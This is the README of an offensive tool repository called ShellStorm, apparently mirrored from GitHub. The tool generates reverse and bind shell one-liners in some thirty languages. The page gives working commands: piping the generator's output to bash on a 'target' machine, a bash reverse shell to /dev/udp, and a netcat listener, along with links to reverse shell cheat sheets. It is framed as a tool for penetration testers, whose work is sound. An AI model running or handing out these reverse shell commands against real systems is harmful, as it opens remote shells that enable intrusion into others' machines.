Vernan3 / ShellStorm

Automatic reverse/bind shell generator cheat sheet.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ShellStorm

Automatic reverse/bind shell generator cheat sheet.

A compilation of knowledge over the years from many pentesters that you will recognize
after reading the source code to make the process of creating reverse and bind connections easier
for cybersecurity analysts.

alt text

  • Install requirements for generate WAR package.
sudo apt-get update -y && sudo apt-get install default-jdk -y

Available languages/programs

asp
awk
bash
c
cpan
dart
gawk
golang
groovy
java
jsp
lua
nc
nc-nef (netcat without -e flag, mkfifo)
nodejs
openssl
perl
php
php-daemon
php-simple
ps1
ps1-ds (powershell download string)
python
ruby
rust
sbd
socat
telnet
war

TL;DR

Try go further

  • In some cases you can download shellstorm in any 'target' machine with Linux kernel (or WSL) and execute it by piping it if you prefer.
bash shellstorm.sh bash 10.2.54.13 1337 | bash
  • Do you want UDP shell? No problem, 'sed' it.
bash shellstorm.sh bash 127.0.0.1 1337 | sed -e 's/tcp/udp/g'
Output:
bash -c "bash -i >& /dev/udp/127.0.0.1/1337 0>&1"
  • You can pipe it too.
bash shellstorm.sh bash 127.0.0.1 1337 | sed -e 's/tcp/udp/g' | bash
Note:  
Remember use -u (udp) flag in netcat listener as following:  
nc -u -lvp 1337

Some relevant sources:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

About

Automatic reverse/bind shell generator cheat sheet.


Languages

Language:Shell 100.0%